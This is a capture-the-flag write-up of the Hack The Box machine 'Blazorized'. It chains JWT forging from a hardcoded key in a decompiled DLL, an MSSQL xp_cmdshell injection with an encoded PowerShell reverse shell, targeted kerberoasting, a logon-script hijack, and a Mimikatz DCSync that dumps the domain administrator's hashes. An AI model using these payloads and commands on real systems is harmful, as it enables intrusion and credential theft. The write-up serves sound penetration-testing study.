TL;DR
This is a Windows Server 2019 machine hosting a web site made with Blazor, an ASP.NET framework for building WebAssembly-based sites. Enumerating the application we are able to retrieve vulnerable binary files and, after reversing them, find out how to create super admin access JWT tokens. Once inside the admin dashboard we use MSSQL injection to gain our first low-priv shell. Regarding escalation, we discover several permissive ACE's with Bloodhond and abuse them with PowerView to move laterally between domain users. Finally we land in a user account holding DCSync permissions, and we use it to root the domain.
KEYWORDS
Blazor, .NET, reversing, dnSpy, Unix time, JWT forging, MSSQL injection, Active Directory, Bloodhound enumeration, PowerView, WriteSPN, targeted kerberoasting, ACL enumeration, script path abuse, DCSync attack, Invoke-Mimikatz.
REFERENCES
https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN
https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericwrite-on-user
ENUMERATION
Port scan.
Copy > nmap $target -p- --min-rate = 5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-10 14:50 EDT
Nmap scan report for 10.10.11.22
Host is up, received user-set (0.060s latency ).
Not shown: 43083 filtered tcp ports (no-response), 22440 closed tcp ports ( conn-refused )
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
49664/tcp open unknown syn-ack
49673/tcp open unknown syn-ack
49692/tcp open unknown syn-ack
49776/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up ) scanned in 54.88 seconds
Enumerate the open ports.
Copy > nmap $target -p53,80,135,139,445,464,3268,5985 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-10 14:53 EDT
Nmap scan report for 10.10.11.22
Host is up, received user-set (0.038s latency ).
Scanned at 2024-10-10 14:53:03 EDT for 19s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| _http-title: Did not follow redirect to http://blazorized.htb
| _http-server-header: Microsoft-IIS/10.0
| http-methods:
| _ Supported Methods: GET HEAD POST OPTIONS
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name )
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| _http-server-header: Microsoft-HTTPAPI/2.0
| _http-title: Not Found
Service Info: Host: DC1 ; OS: Windows ; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 49214/tcp ): CLEAN ( Couldn 't connect)
| Check 2 (port 33356/tcp): CLEAN (Couldn' t connect )
| Check 3 (port 39093/udp ): CLEAN ( Failed to receive data )
| Check 4 (port 35591/udp ): CLEAN ( Timeout )
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
| _ Message signing enabled and required
| smb2-time:
| date: 2024-10-10T18:53:46
| _ start_date: N/A
| _clock-skew: 29s
Nmap done: 1 IP address (1 host up ) scanned in 19.90 seconds Add to hosts file and enumerate the site with Firefox.
Fuzz for subdomains.
Copy > ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 404,302 -t 100 -u http://blazorized.htb -H "Host: FUZZ.blazorized.htb"
/ '___\ /' ___\ / '___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blazorized.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.blazorized.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404,302
________________________________________________
admin [Status: 200, Size: 2042, Words: 149, Lines: 28, Duration: 74ms]
:: Progress: [4989/4989] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:08] :: Errors: 0 :: Add the subdomain to hosts file and enumerate with Firefox.
There is also a "Check for updates" section, if we click and inspect the traffic with Burpsuite, we capture a JWT token.
Decode the token to get an idea how they are formed. We discover they are signed using HS512 symmetric algorithm and also disclose super admin username.
USER
Let's continue inspecting the traffic with Burpsuite. There is a request for a blazor.boot.json that contains information about the application.
It can also be downloaded with Firefox, right click on the tab, click on "Inspect code" and add the path to the JSON file.
In the JSON there is a reference to a DLL called blazorized.helpers.dll. Download it (just enter URL http://blazorized.htb/_framework/blazorized.helpers.dll ) and decompile with dnspy, here we see several things.
First, JWT tokens are signed with a symmetric key (HS512 algorithm), as we had seen before.
A bit further in the code we see the HS512 key hardcoded in the source code, along with other claims and a new subdomain http://api.blazorized.htb
And we find out how the tokens are generated.
The application is using Unix time to calculate token expiration times.
All in all, we have all we need to forge our own super admin ticket. To calculate Unix time I made a short Python script.
Copy import datetime
date = datetime . datetime . utcnow () + datetime . timedelta (seconds = 600 )
unix_time = int (date. timestamp ())
print (unix_time) And used it to calculate expiration time (600 seconds from current time).
Entered this data in https://jwt.io , along with the wanted role and super admin email, so we calculate our forged token.
To use this token we load it in a Firefox tab using the console (F12). First we declare the token variable.
Copy let token = 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJleHAiOjE3Mjg2NzAyODcsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIn0.948SOVXlaqFPcCLwtwYD7ifsRfwyHHAmVUoqGLcPsr6PMCilxzNZZrpL-GjMkBlE3jRqipGWZtgYyra1_dtT-Q'; And assign it to a cookie called jwt
Copy localStorage .setItem ( 'jwt' , token); Reload the site http://admin.blazorized.htb site and you are logged in as super admin.
They say the application talks to the database directly, so we can try an MSSQL injection. The point of entry is the "Check duplicate category names".
For the payload, I used a powershell -e base64-encoded payload.
Copy '; exec master.dbo.xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADEAIgAsADEAOQAxADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA' -- - This provides a reverse shell for user nu_1055
That can be used to retrieve the user flag.
SYSTEM
Start from the low-priv shell and take the opportunity to enumerate the user and the system.
Copy > systeminfo
Host Name: DC1
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0 . 17763 N / A Build 17763
System Type: x64 - based PC
> net user
User accounts for \\DC1
-------------------------------------------------------------------------------
Administrator Guest krbtgt
LSA_3211 LSA_3212 LSA_3213
NU_1055 NU_1056 NU_1057
NU_1058 RSA_4810 RSA_4811
RSA_4812 RSA_4813 RSA_4814
SSA_6010 SSA_6011 SSA_6012
SSA_6013
The command completed successfully.
> net user nu_1055
User name NU_1055
Full Name NU_1055
Comment
User 's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/25/2024 12:55:07 PM
Password expires Never
Password changeable 2/26/2024 12:55:07 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile C:\Users\NU_1055
Home directory C:\Users\NU_1055
Last logon 10/11/2024 9:37:11 AM
Logon hours allowed All
Local Group Memberships *IIS_IUSRS *Remote Management Use
Global Group memberships *Normal_Users *Domain Users
The command completed successfully.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled Transfer a sharphound.exe ingestor to the host and enumerate the domain with Bloodhound. Use the previously list of usernames we have just enumerated and the Bloodhound path finding tool.
There is an interesting edge from nu_1055 to rsa_4810. There is info about WriteSPN edges here:https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN
Basically, we have permission to add an SPN to rsa_4810 account, thus making it vulnerable to targeted kerberoasting (https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting ).
Let's modify account's SPN with powerview.ps1
Copy > . .\powerview.ps1
> Set-DomainObject - Identity RSA_4810 - SET @ {serviceprincipalname = 'hey/hey' } Now request a Kerberos ticket for the SPN we have just created.
Copy > Get-DomainSPNTicket - SPN hey / hey This ticket can be cracked (module 13100), and the password is valid to Evil-WinRM into the host as user rsa_4810
Copy > evil-winrm -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)' -i blazorized.htb Now we can mark rsa_4810 as "Owned" in Bloodhound and continue enumerating. It seems both rsa_4810 and nu_1055 are members of the Remote Management Users group, along with another one called ssa_6010
If we continue enumerating this user we see he is one of the principals with DCSync rights, meaning he is candidate to our next lateral movement.
Enumerate the user's ACL from rsa_4810 shell using PowerView's Get-ObjectAcl cmdlet.
Copy > Get-ObjectAcl - SamAccountName ssa_6010 - ResolveGUIDS | ? { $_.ActiveDirectoryRights -eq "WriteProperty" }
AceQualifier : AccessAllowed
ObjectDN : CN = SSA_6010 , CN = Users , DC = blazorized , DC = htb
ActiveDirectoryRights : WriteProperty
ObjectAceType : Script - Path
ObjectSID : S - 1 - 5 - 21 - 2039403211 - 964143010 - 2924010611 - 1124
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S - 1 - 5 - 21 - 2039403211 - 964143010 - 2924010611 - 1107
AccessMask : 32
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
AceQualifier : AccessAllowed
ObjectDN : CN = SSA_6010 , CN = Users , DC = blazorized , DC = htb
ActiveDirectoryRights : WriteProperty
ObjectAceType : ms - TPM - Tpm - Information - For - Computer
ObjectSID : S - 1 - 5 - 21 - 2039403211 - 964143010 - 2924010611 - 1124
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent , InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S - 1 - 5 - 10
AccessMask : 32
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit , InheritOnly , Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0 We see current user has write permissions over ssa_6010 script path, meaning we can add scripts that will be automatically executed when the user logs in.
Copy > Convert-SidToName S - 1 - 5 - 21 - 2039403211 - 964143010 - 2924010611 - 1107
BLAZORIZED\RSA_4810 Info about how to exploit this is provided here:https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericwrite-on-user
First add a reverse shell in the file shell.bat and save in the SYSVOL folder.
Copy > 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADEAIgAsADEAOQAxADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'| Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shell.bat -Encoding ASCII Now modify the script path for user ssa_6010
Copy > Set-ADUser - Identity SSA_6010 - ScriptPath 'A32FF3AEAA23\shell.bat' Shortly after the user logs in again, the script is executed and a shell is received on port 1919.
From here we can launch a DCSync attack.
We do not know clear text password or hash of user ssa_6010 so cannot do it remotely with Impacket. So we will use a Mimikatz copy stored locally. Download a copy of invoke-mimikatz.ps1 with certutil and dot source the script.
Copy > certutil - urlcache -split -f http: // 10.10 . 14.101 / invoke-mimikatz.ps1
> . . \invoke-mimikatz.ps1 Issue the DCSync attack, the administrator hash is dumped.
Copy > invoke-mimikatz - command '"token::elevate" "lsadump::dcsync /domain:blazorized.htb /user:Administrator"'
. #####. mimikatz 2.2.0 (x64) #19041 Jul 24 2021 11:00:11
. ## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https: // pingcastle.com / https: // mysmartlogon.com ***/
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz(powershell) # lsadump::dcsync /domain:blazorized.htb /user:Administrator
[ DC ] 'blazorized.htb' will be the domain
[ DC ] 'DC1.blazorized.htb' will be the DC server
[ DC ] 'Administrator' will be the user account
[ rpc ] Service : ldap
[ rpc ] AuthnSvc : GSS_NEGOTIATE ( 9 )
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2 / 25 / 2024 12 : 54 : 43 PM
Object Security ID : S - 1 - 5 - 21 - 2039403211 - 964143010 - 2924010611 - 500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
ntlm - 0 : f55ed1465179ba374ec1cad05b34a5f3
ntlm - 1 : eecc741ecf81836dcd6128f5c93313f2
ntlm - 2 : c543bf260df887c25dd5fbacff7dcfb3
ntlm - 3 : c6e7b0a59bf74718bce79c23708a24ff
ntlm - 4 : fe57c7727f7c2549dd886159dff0d88a
ntlm - 5 : b471c416c10615448c82a2cbb731efcb
ntlm - 6 : b471c416c10615448c82a2cbb731efcb
ntlm - 7 : aec132eaeee536a173e40572e8aad961
ntlm - 8 : f83afb01d9b44ab9842d9c70d8d2440a
ntlm - 9 : bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0 : ad37753b9f78b6b98ec3bb65e5995c73
lm - 1 : c449777ea9b0cd7e6b96dd8c780c98f0
lm - 2 : ebbe34c80ab8762fa51e04bc1cd0e426
lm - 3 : 471ac07583666ccff8700529021e4c9f
lm - 4 : ab4d5d93532cf6ad37a3f0247db1162f
lm - 5 : ece3bdafb6211176312c1db3d723ede8
lm - 6 : 1ccc6a1cd3c3e26da901a8946e79a3a5
lm - 7 : 8b3c1950099a9d59693858c00f43edaf
lm - 8 : a14ac624559928405ef99077ecb497ba
Supplemental Credentials:
* Primary:NTLM - Strong - NTOWF *
Random Value : 36ff197ab8f852956e4dcbbe85e38e17
* Primary:Kerberos - Newer - Keys *
Default Salt : BLAZORIZED.HTBAdministrator
Default Iterations : 4096
Credentials
aes256_hmac ( 4096 ) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
aes128_hmac ( 4096 ) : df4dbea7fcf2ef56722a6741439a9f81
des_cbc_md5 ( 4096 ) : 310e2a0438583dce
OldCredentials
aes256_hmac ( 4096 ) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
aes128_hmac ( 4096 ) : db4d9e0e5cd7022242f3e03642c135a6
des_cbc_md5 ( 4096 ) : 1c67ef730261a198
OlderCredentials
aes256_hmac ( 4096 ) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
aes128_hmac ( 4096 ) : 2d9925ef94916523b24e43d1cb8396ee
des_cbc_md5 ( 4096 ) : 9b01158c8923ce68
* Primary:Kerberos *
Default Salt : BLAZORIZED.HTBAdministrator
Credentials
des_cbc_md5 : 310e2a0438583dce
OldCredentials
des_cbc_md5 : 1c67ef730261a198
* Packages *
NTLM - Strong - NTOWF
* Primary:WDigest *
01 7e35fe37aac9f26cecc30390171b6dcf
02 a8710c4caaab28c0f2260e7c7bd3b262
03 81eae4cf7d9dadff2073fbf2d5c60539
04 7e35fe37aac9f26cecc30390171b6dcf
05 9bc0a87fd20d42df13180a506db93bb8
06 26d42d164b0b82e89cf335e8e489bbaa
07 d67d01da1b2beed8718bb6785a7a4d16
08 7f54f57e971bcb257fc44a3cd88bc0e3
09 b3d2ebd83e450c6b0709d11d2d8f6aa8
10 1957f9211e71d307b388d850bdb4223f
11 2fa495bdf9572e0d1ebb98bb6e268b01
12 7f54f57e971bcb257fc44a3cd88bc0e3
13 de0bba1f8bb5b81e634fbaa101dd8094
14 2d34f278e9d98e355b54bbd83c585cb5
15 06b7844e04f68620506ca4d88e51705d
16 97f5ceadabcfdfcc019dc6159f38f59e
17 ed981c950601faada0a7ce1d659eba95
18 cc3d2783c1321d9d2d9b9b7170784283
19 0926e682c1f46c007ba7072444a400d7
20 1c3cec6d41ec4ced43bbb8177ad6e272
21 30dcd2ebb2eda8ae4bb2344a732b88f9
22 b86556a7e9baffb7faad9a153d1943c2
23 c6e4401e50b8b15841988e4314fbcda2
24 d64d0323ce75a4f3dcf0b77197009396
25 4274d190e7bc915d4047d1a63776bc6c
26 a04215f3ea1d2839a3cdca4ae01e2703
27 fff4b2817f8298f09fd45c3be4568ab1
28 2ea3a6b979470233687bd913a8234fc7
29 73d831d131d5e67459a3949ec0733723 The only thing that's left is to open an administrator shell with Impacket.
You are root.
